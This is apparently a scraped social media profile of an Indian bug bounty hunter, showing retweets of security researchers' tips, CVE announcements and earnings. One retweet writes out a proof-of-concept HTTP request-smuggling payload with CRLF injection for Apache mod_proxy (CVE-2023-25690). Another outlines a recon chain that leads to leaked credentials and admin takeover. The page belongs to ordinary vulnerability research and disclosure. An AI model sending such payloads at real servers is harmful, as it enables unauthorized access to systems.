0xhaxor Profile Banner
K.S.S Profile
K.S.S

@0xhaxor

Followers
1K
Following
12K
Media
67
Statuses
3K

Full-Time BBH. Crossed 2 CR In Bug Bounties On all Platforms. Gamer | Hacker

India
Joined March 2015
Don't wanna be here? Send us removal request.
@0xhaxor
K.S.S
2 years
3
1
19
@_jensec
Jenish Sojitra
1 year
Last month was my highest in bug bounty so far with almost $131k in bounty. Total paid reports: 18 Average reward: $7.3k Category: most were logical findings via reversing mobile applications and discovering internal endpoints leading to code execution and missing auth etc
100
128
3K
@0xhaxor
K.S.S
1 year
Burp on a 55inch monitor πŸ˜‚ I love this ❀️
8
6
185
@0xhaxor
K.S.S
1 year
0
0
2
@phithon_xg
Phith0n
2 years
Nexus Repository Manager 3 Unauthenticated Path Traversal (CVE-2024-4956) https://t.co/lb5CNJGqmD This issue is similar to SpringMVC CVE-2018-1271 by @orange_8361
4
70
241
@rpraggnachess
Praggnanandhaa
2 years
Overwhelmed by the love from the fans in Warsaw!😊
@GrandChessTour
Grand Chess Tour
2 years
Praggnanandhaa's autograph marathon in PolandπŸ–‹οΈβœ¨! #ChessSuperstar #superbetrapidblitzpoland #grandchesstour
40
291
4K
@h1_sp1d3r
Eugene Yakovchuk
2 years
0
1
27
@GodfatherOrwa
Godfather Orwa πŸ‡―πŸ‡΄
2 years
@h4x0r_dz VDP_Hackers ❌ Slaves βœ…
8
5
119
@theflow0
Andy Nguyen
2 years
Decided to publish PPPwn early. The first PlayStation 4 Kernel RCE. Supporting FWs upto 11.00. https://t.co/INayQSp8fL
344
951
5K
@0xhaxor
K.S.S
2 years
Fact πŸ˜‚
1
0
11
@galnagli
Nagli
2 years
The damage of VDP programs and their Incentivization is far greater than giving some hunters "points" for farming none-bugs that they can later boast on their CV's, I believe it might actually ruin Bug Bounty platforms in the near future, Let's explore the facts πŸ“œ So VDP's, as
62
159
694
@Osaqii
Osama Sadoqi πŸ‡²πŸ‡¦
2 years
Another P1 using @GodfatherOrwa tip: - Found default IIS BLUE page - Run tool shortscan for iis - Found endpoint like : target~.zip - run fuzz and found zip file with a web.config file leaking creds .Leads to Admin dashboard takeover. #bugbountytip
19
117
680
@bsysop
bsysop
2 years
Are you fuzzing like a pro? πŸš€ Dive into some Ffuf tuning tips that could elevate your game. 🀟🏻 🧡1/x #BugBounty #InfoSec #BugBountyTips #BumBumTips #HackingTips
4
52
205
@GodfatherOrwa
Godfather Orwa πŸ‡―πŸ‡΄
2 years
soon enough there will be a video for BugCrwod Level Up explaining how I found 90% from P1s for the last 12 months with a lot of BB Tips
50
44
810
@bogdantcaciuc7
Bogdan Tcaciuc
2 years
this is my favourite error message by far iykyk
14
48
337
@hacker_
Corben Leo
2 years
Directory-brute forcing? You should NEVER filter based on status code. Paths can exist and return a 404. I’ve seen this so many times: /noexist/ -> 404 Not Found. /api/ -> 404 Not Found, but different response body (JSON formatted) /api/endpoint -> 200 OK Filter by
8
75
454
@hacker_
Corben Leo
2 years
You can find easy critical vulnerabilities. It just takes finding unique attack surfaces. Here's an example of how you can, using a story of how I hacked a car company:
14
208
917
@wugeej
RIVER
2 years
[PoC] [CVE-2023-25690] Apache HTTP Server mod_proxy vul CLRF Injection GET /categories/1%20HTTP/1.1%0d%0aFoo:%20baarr HTTP/1.1 Host: Header Injection GET /categories/1%20HTTP/1.1%0d%0aHost:%20localhost%0d%0a%0d%0aGET%20/SMUGGLED HTTP/1.1 Host: 1.1.1.1 https://t.co/st5iVALH8V
Tweet card summary image
github.com
CVE 2023 25690 Proof of concept - mod_proxy vulnerable configuration on Apache HTTP Server versions 2.4.0 - 2.4.55 leads to HTTP Request Smuggling vulnerability. - dhmosfunk/CVE-2023-25690-POC
1
119
310